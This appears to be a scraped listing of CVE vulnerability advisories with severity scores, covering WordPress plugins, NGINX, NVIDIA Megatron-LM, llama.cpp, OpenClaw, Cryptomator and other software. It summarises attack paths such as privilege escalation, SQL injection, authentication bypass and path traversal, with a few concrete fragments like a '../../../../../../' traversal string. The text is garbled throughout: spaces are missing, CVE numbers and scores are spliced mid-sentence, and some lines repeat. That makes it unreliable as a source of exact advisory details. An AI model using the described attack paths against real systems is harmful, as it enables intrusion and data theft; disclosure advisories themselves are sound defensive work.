servershipswithadefaultCORSconfigurationthatsetsalloworigins=[""]combinedwithallow_credentials=True.Whenbothoftheseoptionsareenabledtogether,Starlette'sCORSMiddlewareCVE-reflectstherequestingOriginheadervalueintheAccess-Control-Allow-Originresponseheaderinsteadof More2026- 8.1returningtheliteral`wildcard.Thiseffectivelygrantsanywebsitetheabilitytomakecredentialedcross-origin Details32610APIrequeststotheGlancesserver,enablingcross-sitedatatheftofsystemmonitoringinformation,configuration secrets,andcommandlineargumentsfromanyuserwhohasanactivebrowsersessionwithaGlancesinstance.

TheImportandexportusersandcustomerspluginforWordPressisvulnerabletoprivilegeescalationinall versionsupto,andincluding,1.29.7.Thisisduetothe'saveextrauserprofilefields'functionnotproperly CVE-restrictingwhichusermetakeyscanbeupdatedviaprofilefields.The'getrestrictedfields'methoddoesnot More2026-includesensitivemetakeyssuchas'wpcapabilities'.Thismakesitpossibleforunauthenticatedattackersto 8.1 Details3629escalatetheirprivilegestoAdministratorbysubmittingacraftedregistrationrequestthatsetsthe 'wpcapabilities'metakey.Thevulnerabilitycanonlybeexploitedifthe"Showfieldsinprofile"settingisenabled andaCSVwithawpcapabilitiescolumnheaderhasbeenpreviouslyimported. TheContestGallerypluginforWordPressisvulnerabletoanauthenticationbypassleadingtoadminaccount takeoverinallversionsupto,andincluding,28.1.5.Thisisduetotheemailconfirmationhandlerinusers- registry-check-after-email-or-pin-confirmation.phpusingtheuser'semailstringinaWHEREID=%sclause CVE-insteadofthenumericuserID,combinedwithanunauthenticatedkey-basedloginendpointinajax-functions- More2026-frontend.php.Whenthenon-defaultRegMailOptional=1settingisenabled,anattackercanregisterwitha 8.1 Details4021craftedemailstartingwiththetargetuserID(e.g.,1poc@example.test),triggertheconfirmationflowto overwritetheadmin's`useractivationkeyviaMySQLintegercoercion,andthenusethepostcg1lloginuserbykeyAJAXactiontoauthenticateastheadminwithoutanycredentials.Thismakesit possibleforunauthenticatedattackerstotakeoveranyWordPressadministratoraccountandgainfullsitecontrol. HTSlibisalibraryforreadingandwritingbioinformaticsfileformats.GZIfilesareusedtoindexblock-compressed GZIP[BGZF]files.IntheGZIloadingfunction,bgzfindexload_hfile(),itwaspossibletotriggeraninteger overflow,leadingtoanunder-orzero-sizedbufferbeingallocatedtostoretheindex.Sixteenzerobyteswould thenbewrittentothisbuffer,and,dependingontheresultoftheoverflowtherestofthefilemayalsobeloaded CVE-intothebufferaswell.Ifthefunctiondidattempttoloadthedata,itwouldeventuallyfailduetonotreadingthe More 2026- 8.1expectednumberofrecords,andthentrytofreetheoverflowedheapbuffer.Exploitingthisbugcausesaheap Details 31970bufferoverflow.Ifauseropensafilecraftedtoexploitthisissue,itcouldleadtotheprogramcrashing,or overwritingofdataandheapstructuresinwaysnotexpectedbytheprogram.Itmaybepossibletousethisto obtainarbitrarycodeexecution.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Theeasiestwork- aroundistodiscardany.gziindexfilesfromuntrustedsources,andusethebgzip-r`optiontorecreatethem.

OneUptimeisasolutionformonitoringandmanagingonlineservices.Priortoversion10.0.34,thefixforCVE- 2026-32306(ClickHouseSQLinjectionviaaggregatequeryparameters)addedcolumnnamevalidationtothe 2026-32306(ClickHouseSQLinjectionviaaggregatequeryparameters)addedcolumnnamevalidationtothe aggregateBymethodbutdidnotapplythesamevalidationtothreeotherqueryconstructionpathsinCVE- MoreStatementGenerator.ThetoSortStatement,toSelectStatement,andtoGroupByStatementmethodsacceptuser- 8.1 DetailscontrolledobjectkeysfromAPIrequestbodiesandinterpolatethemasClickHouseIdentifierparameterswithout33142 verifyingtheycorrespondtoactualmodelcolumns.ClickHouseIdentifierparametersaresubstituteddirectlyinto querieswithoutescaping,soanattackerwhocanreachanyanalyticslistoraggregateendpointcaninject arbitrarySQLthroughcraftedsort,select,orgroupBykeys.Thisissuehasbeenpatchedinversion10.0.34. CVE-LibreChatversion0.8.1-rc2usesthesameJWTsecretfortheusersessionmechanismandRAGAPIwhich More2025- 8.0compromisestheservice-levelauthenticationoftheRAGAPI. Details41258 Admidioisanopen-sourceusermanagementsolution.Versions5.0.6andbelowarevulnerabletoarbitrarySQL InjectionthroughtheMyListconfigurationfeature.TheMyListconfigurationfeatureletsauthenticatedusersdefine customlistcolumnlayouts,storinguser-suppliedcolumnnames,sortdirections,andfilterconditionsintheCVE-admlistcolumnstableviapreparedstatements.However,thesestoredvaluesarelaterreadbackand More2026- 8.0interpolateddirectlyintodynamicallyconstructedSQLquerieswithoutsanitizationorparameterization,creatinga Details32813classicsecond-orderSQLinjectionvulnerability(safewrite,unsaferead).Anattackercanexploitthistoinject arbitrarySQL,potentiallyreading,modifying,ordeletinganydatainthedatabaseandachievingfulldatabase compromise.Thisissuehasbeenfixedinversion5.0.7. OpenClawversionspriorto2026.2.26containametadataspoofingvulnerabilitywherereconnectplatformandCVE-deviceFamilyfieldsareacceptedfromtheclientwithoutbeingboundintothedevice-authsignature.Anattacker More2026- 8.0withapairednodeidentityonthetrustednetworkcanspoofreconnectmetadatatobypassplatform-basednode Details32014commandpoliciesandgainaccesstorestrictedcommands. MuraCMSthrough10.1.10containsaCSRFvulnerabilityintheAddToGroupfunctionalityforusermanagement (cUsers.cfcaddToGroupmethod)thatallowsattackerstoescalateprivilegesbyaddinganyusertoanygroup withoutproperauthorizationchecks.ThevulnerablefunctionlacksCSRFtokenvalidationanddirectlyprocessesCVE-user-supplieduserIdandgroupIdparametersviagetUserManager().createUserInGorup(),enablingmalicious More2025- 8.0websitestoforgerequeststhatautomaticallyexecutewhenanauthenticatedadministratorvisitsacraftedpage. Details55041AddingausertotheSuperAdminsgroup(s2user)isnotpossible.Successfulexploitationresultsintheattacker gainingprivilegeescalationbothhorizontallytoothergroupsandverticallytotheadmingroup.Escalationtothe s2Usergroupisnotpossible. CVE-The"PrivilegedHelper"componentoftheArturiaSoftwareCenter(MacOS)doesnotperformsufficientclientcode More2026-signaturevalidationwhenaclientconnects.Thisleadstoanattackerbeingabletoconnecttothehelperand 7.8 Details24062executeprivilegedactionsleadingtolocalprivilegeescalation. CVE- More2025-AWStats8.0isvulnerabletoCommandInjectionviatheopenfunction 7.8 Details63261 CVE-NVIDIAModelOptimizerforWindowsandLinuxcontainsavulnerabilityintheONNXquantizationfeature,wherea More2026-usercouldcauseunsafedeserializationbyprovidingaspeciallycraftedinputfile.Asuccessfulexploitofthis 7.8 Details24141vulnerabilitymightleadtocodeexecution,escalationofprivileges,datatampering,andinformationdisclosure. NGINXOpenSourceandNGINXPlushaveavulnerabilityinthengxhttpmp4modulemodule,whichmightallow anattackertotriggerabufferover-readorover-writetotheNGINXworkermemoryresultinginitsterminationor CVE-possiblycodeexecution,usingaspeciallycraftedMP4file.ThisissueaffectsNGINXOpenSourceandNGINXPlus More2026-ifitisbuiltwiththengxhttpmp4modulemoduleandthemp4directiveisusedintheconfigurationfile. 7.8 Details32647Additionally,theattackispossibleonlyifanattackercantriggertheprocessingofaspeciallycraftedMP4filewith thengxhttpmp4modulemodule.Note:SoftwareversionswhichhavereachedEndofTechnicalSupport(EoTS) arenotevaluated. CVE-NVIDIAMegatron-LMcontainsavulnerabilityinthehybridconversionscriptwhereanAttackermaycauseanRCE More2025-byconvincingausertoloadamaliciouslycraftedfile.Asuccessfulexploitofthisvulnerabilitymayleadtocode 7.8 Details33248execution,escalationofprivileges,informationdisclosure,anddatatampering. CVE-NVIDIAMegatron-LMcontainsavulnerabilityininferencingwhereanAttackermaycauseanRCEbyconvincinga More2026-usertoloadamaliciouslycraftedinput.Asuccessfulexploitofthisvulnerabilitymayleadtocodeexecution, 7.8 Details24151escalationofprivileges,informationdisclosure,anddatatampering. CVE-NVIDIAMegatron-LMcontainsavulnerabilityincheckpointloadingwhereanAttackermaycauseanRCEby More2026-convincingausertoloadamaliciouslycraftedfile.Asuccessfulexploitofthisvulnerabilitymayleadtocode 7.8 Details24152execution,escalationofprivileges,informationdisclosure,anddatatampering. CVE-NVIDIANeMoFrameworkcontainsavulnerabilityincheckpointloadingwhereanattackercouldcauseremote More2026-codeexecution.Asuccessfulexploitofthisvulnerabilitymightleadtocodeexecution,escalationofprivileges, 7.8 Details24157informationdisclosureanddatatampering. CVE-ImproperRestrictionofOperationswithintheBoundsofaMemoryBuffervulnerabilityinlinkingvision More 7.8rapidvms.Thisissueaffectsrapidvms:beforePR#96. Details33847 TheIntelEPTpagingcodeusesanoptimizationtodeferflushingofanycachedEPTstateuntilthep2mlockis

CVE- dropped,sothatmultiplemodificationsdoneunderthesamelockedregiononlyissueasingleflush.Freeingof More pagingstructureshoweverisnotdeferreduntiltheflushingisdone,andcanresultinfreedpagestransiently 7.8 Details23554 beingpresentincachedstate.Suchstaleentriescanpointtomemoryrangesnotownedbytheguest,thus allowingaccesstounintendedmemoryregions. CVE- More2026- Out-of-boundsWritevulnerabilityinWujekFoliarzDualSenseY-v2.ThisissueaffectsDualSenseY-v2:before54. 7.8 Details33850 CVE- NVIDIANeMoFrameworkcontainsavulnerabilitywhereanattackermaycauseremotecodeexecution.A More2026- successfulexploitofthisvulnerabilitymightleadtocodeexecution,escalationofprivileges,information 7.8 Details24159 disclosureanddatatampering. CVE- ImproperRestrictionofOperationswithintheBoundsofaMemoryBuffervulnerabilityinjoncampbell123 More2026- 7.8 doslib.Thisissueaffectsdoslib:beforedoslib-20250729. Details33851 The32-bitimplementationofNGINXOpenSourcehasavulnerabilityinthengxhttpmp4modulemodule,which mightallowanattackertoover-readorover-writeNGINXworkermemoryresultinginitstermination,usinga CVE- speciallycraftedMP4file.Theissueonlyaffects32-bitNGINXOpenSourceifitisbuiltwiththe More2026- ngxhttpmp4modulemoduleandthemp4directiveisusedintheconfigurationfile.Additionally,theattackis 7.8 Details27784 possibleonlyifanattackercantriggertheprocessingofaspeciallycraftedMP4filewiththe ngxhttpmp4modulemodule.Note:SoftwareversionswhichhavereachedEndofTechnicalSupport(EoTS)are notevaluated. CVE- NVIDIAMegatron-LMcontainsavulnerabilityincheckpointloadingwhereanAttackermaycauseanRCEby More2026- convincingausertoloadamaliciouslycraftedfile.Asuccessfulexploitofthisvulnerabilitymayleadtocode 7.8 Details24150 execution,escalationofprivileges,informationdisclosure,anddatatampering. CVE- Out-of-boundsWritevulnerabilityinMolotovCherryAndroid-ImageMagick7.ThisissueaffectsAndroid- More2026- 7.8 ImageMagick7:before7.1.2-11. Details4756 llama.cppisaninferenceofseveralLLMmodelsinC/C++.Priortob7824,anintegeroverflowvulnerabilityinthe `ggmlnbytesfunctionallowsanattackertobypassmemoryvalidationbycraftingaGGUFfilewithspecificCVE- tensordimensions.Thiscausesggmlnbytes`toreturnasignificantlysmallersizethanrequired(e.g.,4MB More2026- 7.8 insteadofExabytes),leadingtoaheap-basedbufferoverflowwhentheapplicationsubsequentlyprocessesthe Details33298 tensor.ThisvulnerabilityallowspotentialRemoteCodeExecution(RCE)viamemorycorruption.b7824containsa fix. OpenWrtProjectisaLinuxoperatingsystemtargetingembeddeddevices.Inversionspriorto24.10.6,a vulnerabilityinthehotplugcallfunctionallowsanattackertobypassenvironmentvariablefilteringandinjectan arbitraryPATHvariable,potentiallyleadingtoprivilegeescalation.ThefunctionisintendedtofilteroutsensitiveCVE- environmentvariableslikePATHwhenexecutinghotplugscriptsin/etc/hotplug.d,butabugusingstrcmpinstead More2026- 7.8 ofstrncmpcausesthefiltertocomparethefullenvironmentstring(e.g.,PATH=/some/value)againsttheliteral Details30874 "PATH",sothematchalwaysfails.Asaresult,thePATHvariableisneverexcluded,enablinganattackertocontrol whichbinariesareexecutedbyprocd-invokedscriptsrunningwithelevatedprivileges.Thisissuehasbeenfixedin version24.10.6. pydicomisapurePythonpackageforworkingwithDICOMfiles.Versions2.0.0-rc.1through3.0.1arevulnerable toPathTraversalthroughamaliciouslycraftedDICOMDIRReferencedFileIDwhenitissettoapathoutsidetheCVE- File-setroot.pydicomresolvesthepathonlytoconfirmthatitexists,butdoesnotverifythattheresolvedpath More2026- 7.8 remainsundertheFile-setroot.SubsequentpublicFileSetoperationssuchascopy(),write(),and Details32711 remove()+write(useexisting=True)usethatuncheckedpathinfileI/Ooperations.Thisallowsarbitraryfile read/copyand,insomeflows,move/deleteoutsidetheFile-setroot.Thisissuehasbeenfixedinversion3.0.2. libfuseisthereferenceimplementationoftheLinuxFUSE.Fromversion3.18.0tobeforeversion3.18.2,ause- after-freevulnerabilityintheiouringsubsystemoflibfuseallowsalocalattackertocrashFUSEfilesystem CVE- processesandpotentiallyexecutearbitrarycode.Wheniouringthreadcreationfailsduetoresourceexhaustion More2026- (e.g.,cgrouppids.max),fuseuring_start()freestheringpoolstructurebutstoresthedanglingpointerinthe 7.8 Details33150 sessionstate,leadingtoause-after-freewhenthesessionshutsdown.Thetriggerisreliableincontainerized environmentswherecgrouppids.maxlimitsnaturallyconstrainthreadcreation.Thisissuehasbeenpatchedin version3.18.2. RequiresmalwarecodetomisusetheDDKkernelmoduleIOCTLinterface.SuchcodecanusetheinterfaceinanCVE- unsupportedwaythatallowssubversionoftheGPUtoperformwritestoarbitraryphysicalmemorypages.The More2026- 7.8 productutilisesasharedresourceinaconcurrentmannerbutdoesnotattempttosynchroniseaccesstothe Details22163 resource. ScreenToGifisascreenrecordingtool.Inversionsfrom2.42.1andprior,ScreenToGifisvulnerabletoDLL CVE- sideloadingviaversion.dll.Whentheportableexecutableisrunfromauser-writabledirectory,itloadsversion.dll More fromtheapplicationdirectoryinsteadoftheWindowsSystem32directory,allowingarbitrarycodeexecutioninthe 7.8 Details33156 user'scontext.ThisisespeciallyimpactfulbecauseScreenToGifisprimarilydistributedasaportableapplication intendedtoberunfromuser-writablelocations.Attimeofpublication,therearenopubliclyavailablepatches.

PySpectorisastaticanalysissecuritytesting(SAST)FrameworkengineeredformodernPythondevelopment workflows.PySpectorversions0.1.6andpriorareaffectedbyasecurityvalidationbypassinthepluginsystem. Thevalidateplugincode()functioninpluginsystem.py,performsstaticASTanalysistoblockdangerousAPIcallsCVE-beforeapluginistrustedandexecuted.However,theinternalresolvename()helperonlyhandlesast.Nameand More 7.8ast.Attributenodetypes,returningNoneforallothers.Whenapluginusesindirectfunctioncallsviagetattr() Details33139(suchasgetattr(os,'system'))theoutercall'sfuncnodeisoftypeast.Call,causingresolvename()toreturnNone, andthesecuritychecktobesilentlyskipped.Thepluginincorrectlypassesthetrustworkflow,andexecutes arbitrarysystemcommandsontheuser'smachinewhenloaded.Thisissuehasbeenpatchedinversion0.1.7. Aflawwasfoundinthelibtifflibrary.AremoteattackercouldexploitasignedintegeroverflowvulnerabilityintheCVE-putcontig8bitYCbCr44tilefunctionbyprovidingaspeciallycraftedTIFFfile.Thisflawcanleadtoanout-of-bounds More2026- 7.8heapwriteduetoincorrectmemorypointercalculations,potentiallycausingadenialofservice(applicationcrash) Details4775orarbitrarycodeexecution. AdminExpress1.2.5.485containsalocalstructuredexceptionhandlingbufferoverflowvulnerabilitythatallows CVE-localattackerstoexecutearbitrarycodebysupplyinganalphanumericencodedpayloadintheFolderPathfield. More2019-AttackerscantriggerthevulnerabilitythroughtheSystemComparefeaturebypastingacraftedbufferoverflow 7.8 Details25612payloadintotheleft-handsideFolderPathfieldandclickingthescaleicontoexecuteshellcodewithapplication privileges. CVE-NVIDIAMegatronLMcontainsavulnerabilityinquantizationconfigurationloading,whichcouldallowremotecode More2025-execution.Asuccessfulexploitofthisvulnerabilitymightleadtocodeexecution,escalationofprivileges, 7.8 Details33247informationdisclosure,anddatatampering. OpenClawversionspriorto2026.2.21sandboxbrowserentrypointlaunchesx11vncwithoutauthenticationforCVE-noVNCobserversessions,allowingunauthenticatedaccesstotheVNCinterface.Remoteattackersonthehost More2026- 7.7loopbackinterfacecanconnecttotheexposednoVNCporttoobserveorinteractwiththesandboxbrowser Details32064withoutcredentials. CVE-AnAuthenticatedNoSQLInjectionvulnerabilityfoundinUniFiNetworkApplicationcouldallowamaliciousactor More2026- 7.7withauthenticatedaccesstothenetworktoescalateprivileges. Details22558 CVE-Undercertainconditions,anattackercouldbindtothesameportusedbyWebCTRL.Thiscouldallowtheattacker More2026-tocraftandsendmaliciouspacketsandimpersonatetheWebCTRLservicewithoutrequiringcodeinjectioninto 7.7 Details25086theWebCTRLsoftware. AflawwasfoundinKeycloak.Keycloak'sSecurityAssertionMarkupLanguage(SAML)brokerendpointdoesnotCVE-properlyvalidateencryptedassertionswhentheoverallSAMLresponseisnotsigned.Anattackerwithavalid More2026- 7.7signedSAMLassertioncanexploitthisbycraftingamaliciousSAMLresponse.Thisallowstheattackertoinjectan Details2092encryptedassertionforanarbitraryprincipal,leadingtounauthorizedaccessandpotentialinformationdisclosure. Cockpitisaheadlesscontentmanagementsystem.AnyCockpitCMSinstancerunningversion2.13.4orearlier withAPIaccessenabledispotentiallyaffectedbyaaSQLInjectionvulnerabilityintheMongoLiteAggregation Optimizer.Anydeploymentwherethe/api/content/aggregate/{model}endpointispubliclyaccessibleor reachablebyuntrustedusersmaybevulnerable,andattackersinpossessionofavalidread-onlyAPIkey(theCVE-lowestprivilegelevel)canexploitthisvulnerability—noadminaccessisrequired.Anattackercaninjectarbitrary More2026- 7.7SQLviaunsanitizedfieldnamesinaggregationqueries,bypassthe`state=1published-contentfiltertoaccess Details31891unpublishedorrestrictedcontent,andextractunauthorizeddatafromtheunderlyingSQLitecontentdatabase. Thisvulnerabilityhasbeenpatchedinversion2.13.5.Thefixappliesthesamefield-namesanitizationintroduced inv2.13.3fortoJsonPath()tothetoJsonExtractRaw()methodinlib/MongoLite/Aggregation/Optimizer.php, closingtheinjectionvectorintheAggregationOptimizer. Wallosisanopen-source,self-hostablepersonalsubscriptiontracker.Priortoversion4.7.0,theSSRFfixappliedin version4.6.2forCVE-2026-30839andCVE-2026-30840isincomplete.Thevalidate_webhook_url_for_ssrf()CVE-protectionwasaddedtothetest*notificationendpointsbutnottothecorrespondingsave*endpoints.An More2026- 7.7authenticatedusercansaveaninternal/privateIPaddressasanotificationURL,andwhenthecronjob Details33399sendnotifications.phpexecutes,therequestissenttotheinternalIPwithoutanySSRFvalidation.Thisissuehas beenpatchedinversion4.7.0. CVE-AStoredcross-sitescripting(XSS)vulnerabilityaffectsHCLUnicaMarketingOperationsv12.1.8andlower.Stored More2024-cross-sitescripting(alsoknownassecond-orderorpersistentXSS)ariseswhenanapplicationreceivesdatafrom 7.6 Details42210anuntrustedsourceandincludesthatdatawithinitslaterHTTPresponsesinanunsafeway. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,POST /objects/aVideoEncoder.json.phpacceptsarequester-controlledchunkFileparameterintendedforstaged uploadchunks.Insteadofrestrictingthatpathtotrustedserver-generatedchunklocations,theendpointaccepts CVE-arbitrarylocalfilesystempathsthatpassisValidURLOrPath().Thathelperallowsfilesunderbroadserver More2026- 7.6directoriesincluding/var/www/,theapplicationroot,cache,tmp,andvideos,onlyrejecting.php`files.Foran Details33354authenticateduploadereditingtheirownvideo,thisbecomesanarbitrarylocalfileread.Theendpointcopiesthe attacker-chosenlocalfileintotheattacker'spublicvideostoragepath,afterwhichitcanbedownloadedover HTTP.Commit59bbd601a3f65a5b18c1d9e4eb11471c0a59214fcontainsapatchfortheissue. Cryptomatorencryptsdatabeingstoredoncloudinfrastructure.Priortoversion1.19.1,anintegritycheck vulnerabilityallowsanattackertotamperwiththevaultconfigurationfileleadingtoaman-in-the-middle vulnerabilityallowsanattackertotamperwiththevaultconfigurationfileleadingtoaman-in-the-middle CVE-vulnerabilityinHubkeyloadingmechanism.Beforethisfix,theclienttrustedendpointsfromthevaultconfig Morewithouthostauthenticitychecks,whichcouldallowtokenexfiltrationbymixingalegitimateauthendpointwitha 7.6 Details32303maliciousAPIendpoint.ImpactedareusersunlockingHub-backedvaultswithaffectedclientversionsin environmentswhereanattackercanalterthevault.cryptomatorfile.Thisissuehasbeenpatchedinversion 1.19.1. CVE-AnauthorizationbypassvulnerabilityintheVaultsecretsback-endimplementationofJujuversions3.1.6through More2026-3.6.18allowsanauthenticatedunitagenttoperformunauthorizedupdatestosecretrevisions.Withsufficient 7.6 Details32692information,anattackercanpoisonanyexistingsecretrevisionwithinthescopeofthatVaultsecretback-end.

CVE- to8.0.0.2,userswiththeNotes-myencountersrolecanfillEyeExamformsinpatientencounters.Theanswers More2026- totheformcanbeprintedoutinPDFform.AnOut-of-BandServer-SideRequestForgery(OOBSSRF)vulnerability 7.6 Details33321 wasidentifiedinthePDFcreationfunctionwheretheformanswersareparsedasunescapedHTML,allowingan attackertoforgerequestsfromtheservermadetoexternalorinternalresources.Version8.0.0.2fixestheissue. IncusOSisanimmutableOSimagededicatedtorunningIncus.Priorto202603142010,thedefaultconfiguration ofsystemd-cryptenrollasusedbyIncusOSthroughmkosiallowsforanattackerwithphysicalaccesstothe machinetoaccesstheencrypteddatawithoutrequiringanyinteractionbythesystem'sowneroranytampering ofSecureBootstateorkernel(UKI)bootimage.That'sbecauseinthisconfiguration,theLUKSkeyismade availablebytheTPMsolongasthesystemhastheexpectedPCR7valueandthePCR11policymatches.That defaultPCR11policyimportantlyallowsfortheTPMtoreleasethekeytothebootedsystemratherthanjustfrom theinitrdpartofthesignedkernelimage(UKI).Theattackreliesontheattackerbeingabletosubstitutethe originalencryptedrootpartitionforonethattheycontrol.Bydoingso,thesystemwillpromptforarecoverykey onboot,whichtheattackerhasdefinedandcanprovide,beforebootingthesystemusingtheattacker'sroot partitionratherthanthesystem'soriginalone.Theattackeronlyneedstoputasystemdunitstartingonsystem bootwithintheirrootpartitiontohavethesystemrunthatlogiconboot.Thatunitwillthenruninanenvironment CVE- wheretheTPMwillallowfortheretrievaloftheencryptionkeyoftherealrootdisk,allowingtheattackertosteal More2026- theLUKSvolumekey(immutablemasterkey)andthenuseitagainsttherealrootdisk,alteringitorgettingdata 7.6 Details32606 outbeforeputtingthediskbackthewayitwasandreturningthesystemwithoutatraceofthisattackhaving happened.ThisisallpossiblebecausethesystemwillhavestillbootedwithSecureBootenabled,willhave measuredandrantheexpectedbootloaderandkernelimage(UKI).TheinitrdselectstherootdiskbasedonGPT partitionidentifiersmakingitpossibletoeasilysubstitutetherealrootdiskforanattackercontrolledone.This doesn'tleadtoanychangeintheTPMstateandthereforeallowsforretrievaloftheLUKSkeybytheattacker throughaboottimesystemdunitontheiralternativerootpartition.IncusOSversion202603142010(2026/03/14 20:10UTC)includesthenewPCR15logicandwillautomaticallyupdatetheTPMpolicyonboot.Anyonesuspecting thattheirsystemmayhavebeenphysicallyaccessedwhileshutdownshouldperformafullsystemwipeand reinstallationasonlythatwillrotatetheLUKSvolumekeyandpreventsubsequentaccesstotheencrypteddata shouldthesystemhavebeenpreviouslycompromised.Therearenoknownworkaroundsotherthanupdatingtoa versionwithcorrectedlogicwhichwillautomaticallyrebindtheLUKSkeystothenewsetofTPMregistersand preventthisfrombeingexploited. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,auserwiththe"Videos Moderator"permissioncanescalateprivilegestoperformfullvideomanagementoperations—including CVE- ownershiptransferanddeletionofanyvideo—despitethepermissionbeingdocumentedasonlyallowingvideo More2026- publicitychanges(Active,Inactive,Unlisted).TherootcauseisthatPermissions::canModerateVideos()isused 7.6 Details33650 asanauthorizationgateforfullvideoeditinginvideoAddNew.json.php,whilevideoDelete.json.phponly checksownership,creatinganasymmetricauthorizationboundaryexploitableviaatwo-stepownership-transfer- then-deletechain.Commit838e16818c793779406ecbf34ebaeba9830e33f8containsapatch. CryptomatorforAndroidoffersmulti-platformtransparentclient-sideencryptionforfilesinthecloud.Priorto version1.12.3,anintegritycheckvulnerabilityallowsanattackertamperwiththevaultconfigurationfileleading CVE- toaman-in-the-middlevulnerabilityinHubkeyloadingmechanism.Beforethisfix,theclienttrustedendpoints More2026- fromthevaultconfigwithouthostauthenticitychecks,whichcouldallowtokenexfiltrationbymixingalegitimate 7.6 Details32317 authendpointwithamaliciousAPIendpoint.ImpactedareusersunlockingHub-backedvaultswithaffectedclient versionsinenvironmentswhereanattackercanalterthevault.cryptomatorfile.Thisissuehasbeenpatchedin version1.12.3.

9.6.0-alpha.15and8.6.41,anattackerwhoisallowedtouploadfilescanbypassthefileextensionfilterby appendingaMIMEparameter(e.g.;charset=utf-8)totheContent-Typeheader.Thiscausestheextension validationtofailmatchingagainsttheblocklist,allowingactivecontenttobestoredandservedunderthe application'sdomain.Inaddition,certainXML-basedfileextensionsthatcanrenderscriptsinwebbrowsersare notincludedinthedefaultblocklist.ThiscanleadtostoredXSSattacks,compromisingsessiontokens,user credentials,orothersensitivedataaccessibleviathebrowser'slocalstorage.Thefixinversions9.6.0-alpha.15 and8.6.41stripsMIMEparametersfromtheContent-TypeheaderbeforevalidatingthefileextensionagainstCVE- Moretheblocklist.ThedefaultblocklisthasalsobeenextendedtoincludeadditionalXML-basedextensions(xsd,2026- 7.6 Detailsrng,rdf,rdf+xml,owl,mathml,mathml+xml)thatcanrenderactivecontentinwebbrowsers.Note32728 thatthefileUpload.fileExtensionsoptionisintendedtobeconfiguredasanallowlistoffileextensionsthatare validforaspecificapplication,notasadenylist.Thedefaultdenylistisprovidedonlyasabasicdefaultthat coversmostcommonproblematicextensions.Itisnotintendedtobeanexhaustivelistofallpotentially dangerousextensions.Developersshouldnotrelyonthedefaultvalue,asnewextensionsthatcanrenderactive contentinbrowsersmightemergeinthefuture.Asaworkaround,configurethefileUpload.fileExtensionsoption contentinbrowsersmightemergeinthefuture.Asaworkaround,configurethefileUpload.fileExtensionsoption touseanallowlistofonlythefileextensionsthatyourapplicationneeds,ratherthanrelyingonthedefault blocklist. SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,POST/api/import/importSYand POST/api/import/importZipMdwriteuploadedarchivestoapathderivedfromthemultipartfilenamefieldwithoutCVE-sanitization,allowinganadmintowritefilestoarbitrarylocationsoutsidethetempdirectory-includingsystem More2026- 7.6pathsthatenableRCE.Thiscanleadtoaatadestructionbyoverwritingworkspaceorapplicationfiles,andfor Details32749Dockercontainersrunningasroot(commondefault),thisgrantsfullcontainercompromise.Thisissuehasbeen fixedinversion3.6.1. CryptomatorforIOSoffersmulti-platformtransparentclient-sideencryptionforfilesinthecloud.Priortoversion 2.8.3,anintegritycheckvulnerabilityallowsanattackertamperwiththevaultconfigurationfileleadingtoaman- CVE-in-the-middlevulnerabilityinHubkeyloadingmechanism.Beforethisfix,theclienttrustedendpointsfromthe More2026-vaultconfigwithouthostauthenticitychecks,whichcouldallowtokenexfiltrationbymixingalegitimateauth 7.6 Details32318endpointwithamaliciousAPIendpoint.ImpactedareusersunlockingHub-backedvaultswithaffectedclient versionsinenvironmentswhereanattackercanalterthevault.cryptomatorfile.Thisissuehasbeenpatchedin version2.8.3. OpenClawversionspriorto2026.2.26containapathtraversalvulnerabilityinworkspaceboundaryvalidationthatCVE-allowsattackerstowritefilesoutsidetheworkspacethroughin-workspacesymlinkspointingtonon-existentout- More2026- 7.6of-roottargets.Thevulnerabilityexistsbecausetheboundarycheckimproperlyresolvesaliases,permittingthe Details32055firstwriteoperationtoescapetheworkspaceboundaryandcreatefilesinarbitrarylocations. CVE-LyricVideoCreator2.1containsadenialofservicevulnerabilitythatallowsattackerstocrashtheapplicationby More2019-processingmalformedMP3files.AttackerscancreateacraftedMP3filewithanoversizedbufferandtriggerthe 7.5 Details25560crashbyopeningthefilethroughtheBrowsesongfunctionality. WebCTRLsystemsthatcommunicateoverBACnetinherittheprotocol'slackofnetworklayerauthentication.CVE-WebCTRLdoesnotimplementadditionalvalidationofBACnettrafficsoanattackerwithnetworkaccesscould More2026- 7.5spoofBACnetpacketsdirectedateithertheWebCTRLserverorassociatedAutomatedLogiccontrollers.Spoofed Details32666packetsmaybeprocessedaslegitimate. TheJetFormBuilderpluginforWordPressisvulnerabletoarbitraryfilereadviapathtraversalinallversionsupto, andincluding,3.5.6.2.Thisisduetothe'UploadedFile::setfromarray'methodacceptinguser-suppliedfilepaths CVE-fromtheMediaFieldpresetJSONpayloadwithoutvalidatingthatthepathbelongstotheWordPressuploads More2026-directory.Combinedwithaninsufficientsame-filecheckin'FileTools::issamefile'thatonlycompares 7.5 Details4373basenames,thismakesitpossibleforunauthenticatedattackerstoexfiltratearbitrarylocalfilesasemail attachmentsbysubmittingacraftedformrequestwhentheformisconfiguredwithaMediaFieldandaSend Emailactionwithfileattachment. phpTransformer2016.9containsadirectorytraversalvulnerabilitythatallowsunauthenticatedattackerstoCVE-accessarbitraryfilesbymanipulatingthepathparameter.Attackerscansendrequeststothe More2019- 7.5jQueryFileUploadmasterserverendpointwithtraversalsequences../../../../../../tolistandretrievefilesoutsidethe Details25579intendeddirectory. OpenClawversionspriorto2026.2.22failtosanitizeshellstartupenvironmentvariablesHOMEandZDOTDIRinCVE-thesystem.runfunction,allowingattackerstobypasscommandallowlistprotections.Remoteattackerscaninject More2026- 7.5maliciousstartupfilessuchas.bashprofileor.zshenvtoachievearbitrarycodeexecutionbeforeallowlist- Details32056evaluatedcommandsareexecuted. OpenClawversionspriorto2026.2.25containanauthenticationhardeninggapinbrowser-originWebSocketCVE-clientsthatallowsattackerstobypassoriginchecksandauththrottlingonloopbackdeployments.Anattackercan More2026- 7.5trickauserintoopeningamaliciouswebpageandperformpasswordbrute-forceattacksagainstthegatewayto Details32025establishanauthenticatedoperatorsessionandinvokecontrol-planemethods. CVE-CEWEPHOTOSHOW6.4.3containsadenialofservicevulnerabilitythatallowsattackerstocrashtheapplication More2019-bysubmittinganexcessivelylongbuffertothepasswordfield.Attackerscanpastealargestringofrepeated 7.5 Details25552charactersintothepasswordinputduringtheuploadprocesstotriggeranapplicationcrash. TheQuentnWPpluginforWordPressisvulnerabletoSQLInjectionviathe'qntnwpaccess'cookieinallversions 